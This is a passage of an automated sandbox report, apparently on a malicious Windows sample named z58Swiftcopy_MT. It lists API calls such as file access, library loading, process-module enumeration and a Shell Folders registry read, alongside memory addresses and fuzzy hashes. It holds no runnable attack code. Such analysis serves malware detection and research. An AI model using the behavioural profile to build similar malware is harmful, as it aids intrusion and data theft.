                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2154303073-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3150196962-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$PointerRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3154509469-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                                                                        • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                                                                        • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                                                                        • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4232544981-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                                                                      • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$FileModuleName
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3859505661-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                                                                                      • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                                                      • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                                                                                                      • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                                                      • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                                      • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                                                                                                                                                      • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                                      • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                                                      • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                                      • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                                                      • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                                      • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                                      • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                                      • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                                                      • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: EnumNamesResource
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3334572018-0
                                                                                                                                                                                                                                      • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                                                      • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                                      • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                                                      • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseFind
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1863332320-0
                                                                                                                                                                                                                                      • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                                                      • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Open
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                                                                                                      • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                                                      • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                                      • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                                                      • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                                                                                                                                                                                                                      • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                        • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                                                        • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                                                        • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3655998216-0
                                                                                                                                                                                                                                      • Opcode ID: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
